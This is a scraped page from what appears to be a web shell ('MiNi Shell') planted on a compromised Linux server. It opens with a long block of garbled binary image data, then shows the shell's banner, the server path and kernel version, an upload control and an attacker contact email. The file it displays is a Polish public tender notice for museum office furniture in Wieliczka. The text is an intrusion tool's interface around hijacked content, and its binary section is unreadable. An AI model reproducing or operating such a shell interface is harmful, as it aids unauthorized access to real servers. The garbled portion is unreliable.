JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241202/0062787101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa oraz montaż mebli do pomieszczeń biurowych, magazynowych <br/>i socjalnych w budynku administracyjnym Muzeum Żup Krakowskich Wieliczka” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Żup Krakowskich Wieliczka w Wieliczce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zamkowa 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.trzepiotowska@muzeum.wieliczka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.muzeum.wieliczka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa instytucja kultury </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa oraz montaż mebli do pomieszczeń biurowych, magazynowych <br/>i socjalnych w budynku administracyjnym Muzeum Żup Krakowskich Wieliczka” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-204a11c2-417a-468d-84a5-eeb52fe9a478</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00627871</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-204a11c2-417a-468d-84a5-eeb52fe9a478 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>3. Komunikacja w postępowaniu, z wyłączeniem składania ofert (sposób składania ofert opisano w Dziale XI SWZ) odbywa się drogą<br/>elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce &#34;Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>4. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określono w Dziale XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Określono w Dziale XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP-26-5/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie, dostawa oraz montaż nowych, mebli do pomieszczeń biurowych (pomieszczenie nr N2.05.1, N2.05.2 i N2.02) w pomieszczeniach budynku administracyjnego Muzeum Żup Krakowskich Wieliczka przy ul. Daniłowicza 12 w Wieliczce o parametrach minimalnych i w ilościach wskazanych w dokumentacji projektowej. W cenie oferty zawarte są również koszty transportu, rozładunku, wniesienia i montażu (jeżeli dany rodzaj mebla tego wymaga) mebli do miejsca wskazanego w dokumentacji projektowej oraz do wykonania wszelkich niezbędnych prac związanych z prawidłową realizacją przedmiotu zamówienia.<br/>1.1. Szczegółowy opis przedmiotu zamówienia oraz wymagania Zamawiającego względem przedmiotu zamówienia zostały określone w następujących załącznikach:<br/>1.1.1. Szczegółowy Opis Przedmiotu Zamówienia (SOPZ), który stanowi załącznik nr 2 do SWZ, w tym:<br/>1.1.1.1. Projekt wykonawczy aranżacji wnętrz pomieszczeń N2.05.1, N2.05.2, N2.02, NP.13, N2.06 i N2.08 stanowiący załącznik nr 2A.1 do SWZ,<br/>1.1.1.2. Projekt wykonawczy aranżacji wnętrz pomieszczeń NP.05, Np.12, N0.16 i N1.09 stanowiący załącznik nr 2A.2 do SWZ;<br/>1.1.1.3. Projekt wykonawczy aranżacji wnętrz pomieszczeń S0.10, S0.11, S0.12 i S0.13 stanowiący załącznik nr 2A.3 do SWZ<br/>1.1.1.4. Opis aranżacji wnętrz pomieszczeń N2.05.1, N2.05.2, N2.02, NP.13, N2.06 i N2.08, stanowiący załącznik nr 2B.1 do SWZ,<br/>1.1.1.5. Opis aranżacji wnętrz pomieszczeń NP.05, Np.12, N0.16 i N1.09 stanowiący załącznik nr 2B.2 do SWZ,<br/>1.1.1.6. Opis aranżacji wnętrz pomieszczeń S0.10, S0.11, S0.12 i S0.13 stanowiący załącznik nr 2B.3 do SWZ<br/>1.1.1.7. Zestawienie wyposażenia dla pomieszczeń N2.05.1, N2.05.2, N2.02, stanowiący załącznik nr 2C do SWZ,<br/>1.1.1.8. Zestawienie wyposażenia dla pomieszczeń NP.13, N2.06 i N2.08, stanowiący załącznik nr 2D.1 do SWZ,<br/>1.1.1.9. Zestawienie wyposażenia dla pomieszczeń NP.05, NP.12, N0.16, N1.09, stanowiący załącznik nr 2D.2 do SWZ,<br/>1.1.1.10. Zestawienie wyposażenia dla pomieszczeń S0.10, S0.11, S0.12, S0.13, stanowiący załącznik nr 2D.3 do SWZ, <br/>1.2. Wzór umowy stanowiący załącznik nr 4 do SWZ;<br/>1.3. Kalkulacja ceny (Formularzu oferty cenowej) stanowiącym załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39130000-2 - Meble biurowe</p> <p class="mb-0">39150000-8 - Różne meble i wyposażenie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający przewiduje również w ramach zlecenia prawa opcji dostawę polegającą na wykonaniu, dostawie oraz montażu nowych, mebli do pomieszczeń biurowych i magazynowych (pomieszczenia nr N1.09, S0.10, S0.11, S0.12,S0.13, NP.13, N2.06 i N2.08) oraz polegającą na wykonaniu, dostawie oraz montażu nowych, wybranych mebli do pomieszczeń socjalnych (pomieszczenia nr NP.05, NP.12, N0.16) znajdujących się w budynku administracyjnym Muzeum Żup Krakowskich Wieliczka przy ul. Daniłowicza 12 w Wieliczce o parametrach minimalnych i w ilościach wskazanych w dokumentacji projektowej. W cenie oferty (objętej prawem opcji) zawarte są również koszty transportu, rozładunku, wniesienia i montażu (jeżeli dany rodzaj mebla tego wymaga) mebli do miejsca wskazanego w dokumentacji projektowej oraz do wykonania wszelkich niezbędnych prac związanych z prawidłową realizacją przedmiotu zamówienia. <br/>2. Szczegółowy Opis Przedmiotu Zamówienia (SOPZ), który stanowi załącznik nr 2 do SWZ, w tym:<br/>2.1. Projekt wykonawczy aranżacji wnętrz pomieszczeń N2.05.1, N2.05.2, N2.02, NP.13, N2.06 i N2.08 stanowiący załącznik nr 2A.1 do SWZ<br/>2.2.	Projekt wykonawczy aranżacji wnętrz pomieszczeń NP.05, Np.12, N0.16 i N1.09 stanowiący załącznik nr 2A.2 do SWZ;<br/>2.3.	Projekt wykonawczy aranżacji wnętrz pomieszczeń S0.10, S0.11, S0.12 i S0.13 stanowiący załącznik nr 2A.3 do SWZ<br/>2.4.	Opis aranżacji wnętrz pomieszczeń N2.05.1, N2.05.2, N2.02, NP.13, N2.06 i N2.08, stanowiący załącznik nr 2B.1 do SWZ,<br/>2.5.	Opis aranżacji wnętrz pomieszczeń NP.05, Np.12, N0.16 i N1.09 stanowiący załącznik nr 2B.2 do SWZ,<br/>2.6.	Opis aranżacji wnętrz pomieszczeń S0.10, S0.11, S0.12 i S0.13 stanowiący załącznik nr 2B.3 do SWZ<br/>2.7.	Zestawienie wyposażenia dla pomieszczeń NP.13, N2.06 i N2.08, stanowiący załącznik nr 2D.1 do SWZ,<br/>2.8.	nie wyposażenia dla pomieszczeń NP.05, NP.12, N0.16, N1.09, stanowiący załącznik nr 2D.2 do SWZ,<br/>2.9.	Zestawienie wyposażenia dla pomieszczeń S0.10, S0.11, S0.12, S0.13, stanowiący załącznik nr 2D.3 do SWZ,,<br/>3.	Wzór umowy stanowiący załącznik nr 4 do SWZ.<br/>4.	Kalkulacja ceny (Formularzu oferty cenowej) stanowiącym załącznik nr 5 do SWZ.<br/>5. Zamawiający zleci dostawę mebli, o których mowa w pkt. 1 Działu III SWZ (dostawa gwarantowana) a meble, o których mowa w pkt. 2 powyżej objęte są prawem opcji. Oznacza to, że Zamawiający może zlecić dostawę mebli z pkt. 2 Działu III SWZ w całości lub części (poszczególne meble) na zasadach określonych w pkt 5.1. i 5.2 poniżej,<br/>5.1.	Zamawiający informuje, że dostawa mebli określona w pkt. 2 powyżej stanowi zadanie opcjonalne, którego realizację Zamawiający warunkuje pozyskaniem środków finansowych na realizację w/w zadania (prawo opcji). W przypadku, gdyby Zamawiający nie pozyska środków finansowych na realizację w/w zadanie, do trzech (3) dni po podpisaniu umowy na zakres gwarantowany, prawo opcji wygaśnie, tj. Zamawiający nie będzie mógł skorzystać z przewidzianego prawa opcji.<br/>5.2.	Zlecenie wykonania dostawy mebli objętej prawem opcji nastąpi co najmniej na 5 dni przed terminem rozpoczęcia ich wykonania z maksymalnym terminem realizacji do dnia 27.12.2024 r. Zlecenie wykonania dostaw mebli w części objętej prawem opcji nastąpi pisemnie i zostanie jednocześnie przekazane mailem na adres wskazany przez Wykonawcę. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-01-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na cały przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, nie będzie wezwany do złożenia podmiotowych środków dowodowych w celu wykazania braku podstaw wykluczenia z postępowania, o których mowa w Dziale V pkt 2 SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wraz z Formularzem oferty stanowiącym załącznik nr 1 do SWZ (wzór), należy złożyć:<br/>1.1. Formularz oferty cenowej (kalkulacja ceny) (wzór załącznik nr 5 do SWZ),<br/>1.2. Oświadczenie (oświadczenia) z art. 125 ust. 1 Pzp (wzór stanowi załącznik nr 3 do SWZ), <br/>1.3. Pełnomocnictwo (jeżeli dotyczy, z zastrzeżeniem pkt. 2.1.1. Działu XI SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. Pzp, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. W przypadku spółki cywilnej lub konsorcjum, zgodnie z art 58 ust 2 Pzp wspólnicy spółki cywilnej lub członkowie<br/>konsorcjum zobowiązani są do:<br/>2.1. ustanawiania pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.2. złożenia wraz z ofertą stosownego pełnomocnictwa (w przypadku konsorcjum) albo w przypadku spółki cywilnej<br/>pełnomocnictwa lub umowy spółki cywilnej, z której będzie wynikało umocowanie do reprezentowania wspólników spółki<br/>cywilnej w szczególności do reprezentowania wykonawców w postępowaniu w sprawie zamówienia publicznego albo do<br/>reprezentowania wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o zamówienie, Zamawiający wymaga<br/>przedłożenia kopii umowy regulującej współpracę tych Wykonawców, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 15<br/>Zmiana Umowy<br/>1. Zmiany treści niniejszej Umowy wymagają pod rygorem nieważności zgody obu Stron, z zachowaniem formy pisemnej.<br/>2. Zamawiający przewiduje możliwość przedłużenia terminu wykonania Przedmiotu umowy w następujących przypadkach:<br/>1) w przypadku zaistnieje konieczność zmiany określona w art. 455 ust. 1 pkt 3) lub 4) Pzp.<br/>2) w przypadku wystąpienia Siły wyższej – w takim przypadku termin wykonania poszczególnych części lub termin wykonania Przedmiotu umowy może zostać przedłużony o okres w jakim realizacja Przedmiotu umowy przez Wykonawcę nie była możliwa z powodu wystąpienia Siły wyższej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-10 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Przedmiot zamówienia winien zostać zrealizowany w terminie:<br/>1.1. Dostawa wybranych nowych mebli do pomieszczenia magazynu N2.05.1, N2.05.2 i N2.02 (gwarantowana) do 27.12.2024 r., liczony od dnia zawarcia umowy.<br/>1.2. Dostawa nowych mebli do pomieszczenia magazynów N1.09, S0.10, S0.11, S0.12,S0.13, NP.13, N2.06 i N2.08, NP.05, NP.12, N0.16 oraz dostawa wybranych nowych mebli do pomieszczenia magazynów N2.08 (objętego prawem opcji) do 27.12.2024 r., liczony od momentu przekazania decyzji o skorzystaniu przez Zamawiającego z prawa opcji, o którym mowa w pkt. 3.1. – 3.2. Działu III SWZ.<br/>1.3. Montaż mebli dla części gwarantowanej jak i objętej prawem opcji do dnia 29 stycznia 2025r, przy czym w dniach 28.12.2024r - 10.01.2025 r. montaż mebli nie będzie możliwy.<br/><br/>2. Zamawiający wykluczy z postępowania Wykonawcę w przypadkach, o których mowa w:<br/>2.1. art. 108 ust. 1 pkt 1) - 6) Pzp (obligatoryjne przesłanki wykluczenia),<br/>2.2. art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Względem Wykonawcy podlegającego wykluczeniu w tym zakresie, stosuje się art. 7 ust. 3 wspominanej ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com